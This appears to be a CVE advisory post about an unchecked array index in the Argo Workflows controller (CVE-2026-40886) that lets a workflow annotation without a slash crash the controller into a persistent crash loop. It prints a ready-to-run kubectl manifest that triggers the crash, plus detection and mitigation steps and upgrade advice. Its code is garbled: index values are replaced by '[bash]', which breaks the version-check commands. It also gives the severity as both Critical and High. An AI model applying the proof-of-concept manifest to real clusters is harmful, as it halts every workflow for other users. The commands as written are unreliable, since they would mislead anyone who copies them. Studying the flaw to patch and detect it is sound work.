Argo Workflows, Unchecked Array Index, CVE-2026-40886 (Critical)

Listen to this Post

The core of the issue lies in the `podGCFromPod()` function within the Argo Workflows controller. When the controller processes a workflow pod, it looks for a specific annotation: workflows.argoproj.io/pod-gc-strategy. The function attempts to parse this annotation’s value by splitting it on the “/” character. The code then unconditionally accesses the second element (parts

</code>) of the resulting slice, assuming the slash is always present. By crafting a workflow that includes this annotation but omits the slash (e.g., setting its value to "NoSlash"), the `strings.Split()` function returns a slice of length 1. The subsequent attempt to read `parts[bash]` triggers a fatal "index out of range" panic. This panic does not occur in a cleanly recoverable goroutine; it happens inside the pod informer goroutine, which is outside the controller's central recovery scope. Consequently, the entire Argo controller process crashes immediately. Because the poisoned pod's annotation persists, the controller will crash on every restart upon seeing the same pod, leading to a permanent crash loop and a complete denial of service for all workflows on the cluster.
Platform: Argo Workflows
Version: 3.6.5-4.0.4
Vulnerability: Unchecked Array Index
Severity: High
Date: 2026-04-23

<h2 style="color: blue;">Prediction: 2026-04-23</h2>

<h2 style="color: blue;">What Undercode Say:</h2>

<h2 style="color: blue;">Analytics:</h2>

The following bash commands can be used to detect and exploit this vulnerability.
[bash]
Check your Argo Workflows controller version
kubectl get deployment -n argo workflow-controller -o jsonpath='{.spec.template.spec.containers[bash].image}'
PoC command to crash the controller
kubectl apply -n argo -f - <<'EOF'
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
name: crash-podgc
spec:
entrypoint: main
serviceAccountName: default
podGC:
strategy: OnPodCompletion
podMetadata:
annotations:
workflows.argoproj.io/pod-gc-strategy: "NoSlash"
templates:
- name: main
container:
image: alpine:3.18
command: [echo, "hello"]
EOF
Check for controller crash loop
kubectl get pods -n argo -l app=workflow-controller
Mitigation: Delete the malicious workflow to stop the crash loop
kubectl delete workflow -n argo crash-podgc
Bash one-liner to check for vulnerable controller versions
vuln_versions=("3.6.5" "3.6.6" "3.6.7" "3.6.8" "3.6.9" "3.6.10" "3.6.11" "3.6.12" "3.6.13" "3.6.14" "3.6.15" "3.6.16" "3.6.17" "3.6.18" "3.6.19" "3.7.0" "3.7.1" "3.7.2" "3.7.3" "3.7.4" "3.7.5" "3.7.6" "3.7.7" "3.7.8" "3.7.9" "3.7.10" "3.7.11" "3.7.12" "3.7.13" "4.0.0" "4.0.1" "4.0.2" "4.0.3" "4.0.4")
current_version=$(kubectl get deployment -n argo workflow-controller -o jsonpath='{.spec.template.spec.containers[bash].image}' | cut -d':' -f2)
if [[ " ${vuln_versions[@]} " =~ " ${current_version} " ]]; then
echo "CRITICAL: Running vulnerable version $current_version"
else
echo "Not running a known vulnerable version."
fi

How Exploit:

An attacker with `create` permission on Workflow resources can exploit this vulnerability by submitting a workflow where the `workflows.argoproj.io/pod-gc-strategy` annotation is set to any value that does not contain a slash "/" character. The moment the controller processes the pod created by this workflow, it will crash, entering a `CrashLoopBackOff` state. This crash loop will persist indefinitely until the offending workflow or its associated pods are manually deleted from the cluster, causing a sustained denial-of-service.

Protection from this CVE

Upgrade your Argo Workflows controller to a fixed version: v4.0.5 or v3.7.14 or later. If an immediate upgrade is not possible, implement a Kubernetes admission webhook (e.g., OPA/Gatekeeper) to validate or reject any incoming workflow that contains a `workflows.argoproj.io/pod-gc-strategy` annotation with a missing slash.

Impact

This vulnerability results in a complete and persistent Denial of Service (DoS) for the Argo Workflows controller. The controller becomes unable to process any workflows, new or existing. All workflows across the entire cluster are halted, as the controller is in a permanent crash loop. The impact requires manual intervention to delete the poisoned pod, making it a severe operational disruption with a CVSS 3.1 base score of 7.7 (High).

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top